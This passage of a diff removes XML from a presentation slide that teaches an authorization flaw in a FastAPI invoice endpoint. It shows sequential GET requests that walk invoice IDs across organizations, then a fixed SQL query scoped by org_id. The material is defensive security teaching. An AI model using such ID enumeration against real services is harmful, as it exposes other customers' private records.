-          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="45700" rIns="91425" bIns="45700" anchor="t" anchorCtr="0">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="r" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
-                <a:solidFill>
-                  <a:srgbClr val="5B21B6"/>
-                </a:solidFill>
-                <a:latin typeface="Courier New"/>
-                <a:ea typeface="Courier New"/>
-                <a:cs typeface="Courier New"/>
-                <a:sym typeface="Courier New"/>
-              </a:rPr>
-              <a:t>Python (FastAPI)</a:t>
-            </a:r>
-            <a:endParaRPr/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="114" name="Google Shape;114;g3ec891ba402_1_337"/>
-          <p:cNvSpPr/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="731520" y="1463040"/>
-            <a:ext cx="10728600" cy="4937700"/>
-          </a:xfrm>
-          <a:prstGeom prst="roundRect">
-            <a:avLst>
-              <a:gd name="adj" fmla="val 16667"/>
-            </a:avLst>
-          </a:prstGeom>
-          <a:solidFill>
-            <a:srgbClr val="F0F0F4"/>
-          </a:solidFill>
-          <a:ln w="12700" cap="flat" cmpd="sng">
-            <a:solidFill>
-              <a:srgbClr val="EEEEF0"/>
-            </a:solidFill>
-            <a:prstDash val="solid"/>
-            <a:round/>
-            <a:headEnd type="none" w="sm" len="sm"/>
-            <a:tailEnd type="none" w="sm" len="sm"/>
-          </a:ln>
-          <a:effectLst>
-            <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
-              <a:srgbClr val="000000">
-                <a:alpha val="34900"/>
-              </a:srgbClr>
-            </a:outerShdw>
-          </a:effectLst>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="45700" rIns="91425" bIns="45700" anchor="ctr" anchorCtr="0">
-            <a:noAutofit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:endParaRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
-              <a:solidFill>
-                <a:schemeClr val="dk1"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
-              <a:ea typeface="Calibri"/>
-              <a:cs typeface="Calibri"/>
-              <a:sym typeface="Calibri"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="115" name="Google Shape;115;g3ec891ba402_1_337"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="1005840" y="1645920"/>
-            <a:ext cx="10179900" cy="5212800"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-          <a:ln>
-            <a:noFill/>
-          </a:ln>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="45700" rIns="91425" bIns="45700" anchor="t" anchorCtr="0">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="1500" b="1" i="0" u="none" strike="noStrike" cap="none">
-                <a:solidFill>
-                  <a:srgbClr val="333344"/>
-                </a:solidFill>
-                <a:latin typeface="Courier New"/>
-                <a:ea typeface="Courier New"/>
-                <a:cs typeface="Courier New"/>
-                <a:sym typeface="Courier New"/>
-              </a:rPr>
-              <a:t># THE EXPLOIT: you're a member of org 5 (legitimately).</a:t>
-            </a:r>
-            <a:endParaRPr sz="1600"/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="200"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="1500" b="1" i="0" u="none" strike="noStrike" cap="none">
-                <a:solidFill>
-                  <a:srgbClr val="333344"/>
-                </a:solidFill>
-                <a:latin typeface="Courier New"/>
-                <a:ea typeface="Courier New"/>
-                <a:cs typeface="Courier New"/>
-                <a:sym typeface="Courier New"/>
-              </a:rPr>
-              <a:t>#   GET /orgs/5/invoices/1</a:t>
-            </a:r>
-            <a:endParaRPr sz="1600"/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="200"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="1500" b="1" i="0" u="none" strike="noStrike" cap="none">
-                <a:solidFill>
-                  <a:srgbClr val="333344"/>
-                </a:solidFill>
-                <a:latin typeface="Courier New"/>
-                <a:ea typeface="Courier New"/>
-                <a:cs typeface="Courier New"/>
-                <a:sym typeface="Courier New"/>
-              </a:rPr>
-              <a:t>#   GET /orgs/5/invoices/2</a:t>
-            </a:r>
-            <a:endParaRPr sz="1600"/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="200"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="1500" b="1" i="0" u="none" strike="noStrike" cap="none">
-                <a:solidFill>
-                  <a:srgbClr val="333344"/>
-                </a:solidFill>
-                <a:latin typeface="Courier New"/>
-                <a:ea typeface="Courier New"/>
-                <a:cs typeface="Courier New"/>
-                <a:sym typeface="Courier New"/>
-              </a:rPr>
-              <a:t>#   GET /orgs/5/invoices/3   ...</a:t>
-            </a:r>
-            <a:endParaRPr sz="1600"/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="200"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="1500" b="1" i="0" u="none" strike="noStrike" cap="none">
-                <a:solidFill>
-                  <a:srgbClr val="333344"/>
-                </a:solidFill>
-                <a:latin typeface="Courier New"/>
-                <a:ea typeface="Courier New"/>
-                <a:cs typeface="Courier New"/>
-                <a:sym typeface="Courier New"/>
-              </a:rPr>
-              <a:t># invoice_id isn't scoped to the org, so you walk every </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1500" b="1">
-                <a:solidFill>
-                  <a:srgbClr val="333344"/>
-                </a:solidFill>
-                <a:latin typeface="Courier New"/>
-                <a:ea typeface="Courier New"/>
-                <a:cs typeface="Courier New"/>
-                <a:sym typeface="Courier New"/>
-              </a:rPr>
-              <a:t>invoice in the database</a:t>
-            </a:r>
-            <a:endParaRPr sz="1600"/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="200"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:endParaRPr sz="1500" b="1" i="0" u="none" strike="noStrike" cap="none">
-              <a:solidFill>
-                <a:srgbClr val="333344"/>
-              </a:solidFill>
-              <a:latin typeface="Courier New"/>
-              <a:ea typeface="Courier New"/>
-              <a:cs typeface="Courier New"/>
-              <a:sym typeface="Courier New"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="200"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:endParaRPr sz="1500" b="1" i="0" u="none" strike="noStrike" cap="none">
-              <a:solidFill>
-                <a:srgbClr val="333344"/>
-              </a:solidFill>
-              <a:latin typeface="Courier New"/>
-              <a:ea typeface="Courier New"/>
-              <a:cs typeface="Courier New"/>
-              <a:sym typeface="Courier New"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="200"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="1500" b="1" i="0" u="none" strike="noStrike" cap="none">
-                <a:solidFill>
-                  <a:srgbClr val="333344"/>
-                </a:solidFill>
-                <a:latin typeface="Courier New"/>
-                <a:ea typeface="Courier New"/>
-                <a:cs typeface="Courier New"/>
-                <a:sym typeface="Courier New"/>
-              </a:rPr>
-              <a:t># THE FIX: tie the item to the container in the query.</a:t>
-            </a:r>
-            <a:endParaRPr sz="1600"/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="200"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="1500" b="1" i="0" u="none" strike="noStrike" cap="none">
-                <a:solidFill>
-                  <a:srgbClr val="333344"/>
-                </a:solidFill>
-                <a:latin typeface="Courier New"/>
-                <a:ea typeface="Courier New"/>
-                <a:cs typeface="Courier New"/>
-                <a:sym typeface="Courier New"/>
-              </a:rPr>
-              <a:t>        invoice = conn.execute(</a:t>
-            </a:r>
-            <a:endParaRPr sz="1600"/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="200"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="1500" b="1" i="0" u="none" strike="noStrike" cap="none">
-                <a:solidFill>
-                  <a:srgbClr val="333344"/>
-                </a:solidFill>
-                <a:latin typeface="Courier New"/>
-                <a:ea typeface="Courier New"/>
-                <a:cs typeface="Courier New"/>
-                <a:sym typeface="Courier New"/>
-              </a:rPr>
-              <a:t>            text("""</a:t>
-            </a:r>
-            <a:endParaRPr sz="1600"/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="200"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="1500" b="1" i="0" u="none" strike="noStrike" cap="none">
-                <a:solidFill>
-                  <a:srgbClr val="333344"/>
-                </a:solidFill>
-                <a:latin typeface="Courier New"/>
-                <a:ea typeface="Courier New"/>
-                <a:cs typeface="Courier New"/>
-                <a:sym typeface="Courier New"/>
-              </a:rPr>
-              <a:t>                SELECT * FROM invoices</a:t>
-            </a:r>
-            <a:endParaRPr sz="1600"/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="200"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="1500" b="1" i="0" u="none" strike="noStrike" cap="none">
-                <a:solidFill>
-                  <a:srgbClr val="333344"/>
-                </a:solidFill>
-                <a:latin typeface="Courier New"/>
-                <a:ea typeface="Courier New"/>
-                <a:cs typeface="Courier New"/>
-                <a:sym typeface="Courier New"/>
-              </a:rPr>
-              <a:t>                WHERE id = :id AND org_id = :org</a:t>
-            </a:r>
-            <a:endParaRPr sz="1600"/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="200"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="1500" b="1" i="0" u="none" strike="noStrike" cap="none">
-                <a:solidFill>
-                  <a:srgbClr val="333344"/>
-                </a:solidFill>
-                <a:latin typeface="Courier New"/>
-                <a:ea typeface="Courier New"/>
-                <a:cs typeface="Courier New"/>
-                <a:sym typeface="Courier New"/>
-              </a:rPr>
-              <a:t>            """),</a:t>
-            </a:r>
-            <a:endParaRPr sz="1600"/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="200"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="1500" b="1" i="0" u="none" strike="noStrike" cap="none">
-                <a:solidFill>
-                  <a:srgbClr val="333344"/>
-                </a:solidFill>
-                <a:latin typeface="Courier New"/>
-                <a:ea typeface="Courier New"/>
-                <a:cs typeface="Courier New"/>
-                <a:sym typeface="Courier New"/>
-              </a:rPr>
-              <a:t>            {"id": invoice_id, "org": org_id},</a:t>
-            </a:r>
-            <a:endParaRPr sz="1600"/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="200"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="1500" b="1" i="0" u="none" strike="noStrike" cap="none">
-                <a:solidFill>
-                  <a:srgbClr val="333344"/>
-                </a:solidFill>
-                <a:latin typeface="Courier New"/>
-                <a:ea typeface="Courier New"/>
-                <a:cs typeface="Courier New"/>
-                <a:sym typeface="Courier New"/>
-              </a:rPr>
-              <a:t>        ).first()</a:t>
-            </a:r>
-            <a:endParaRPr sz="1600"/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="200"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="1500" b="1" i="0" u="none" strike="noStrike" cap="none">
-                <a:solidFill>
-                  <a:srgbClr val="333344"/>
-                </a:solidFill>
-                <a:latin typeface="Courier New"/>
-                <a:ea typeface="Courier New"/>
-                <a:cs typeface="Courier New"/>
-                <a:sym typeface="Courier New"/>
-              </a:rPr>
-              <a:t>    if invoice is None:</a:t>
-            </a:r>
-            <a:endParaRPr sz="1600"/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="200"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="1500" b="1" i="0" u="none" strike="noStrike" cap="none">
-                <a:solidFill>
-                  <a:srgbClr val="333344"/>
-                </a:solidFill>
-                <a:latin typeface="Courier New"/>
-                <a:ea typeface="Courier New"/>
-                <a:cs typeface="Courier New"/>
-                <a:sym typeface="Courier New"/>
-              </a:rPr>
-              <a:t>        raise HTTPException(404)</a:t>
-            </a:r>
-            <a:endParaRPr sz="1600"/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="200"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="1500" b="1" i="0" u="none" strike="noStrike" cap="none">
-                <a:solidFill>
-                  <a:srgbClr val="333344"/>
-                </a:solidFill>
-                <a:latin typeface="Courier New"/>
-                <a:ea typeface="Courier New"/>
-                <a:cs typeface="Courier New"/>
-                <a:sym typeface="Courier New"/>
-              </a:rPr>
-              <a:t>    return dict(invoice._mapping)</a:t>
-            </a:r>
-            <a:endParaRPr sz="1600"/>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="200"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:endParaRPr sz="1500" b="1" i="0" u="none" strike="noStrike" cap="none">
-              <a:solidFill>
-                <a:srgbClr val="333344"/>
-              </a:solidFill>
-              <a:latin typeface="Courier New"/>
-              <a:ea typeface="Courier New"/>
-              <a:cs typeface="Courier New"/>
-              <a:sym typeface="Courier New"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="200"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:endParaRPr sz="1600"/>
           </a:p>
         </p:txBody>
       </p:sp>
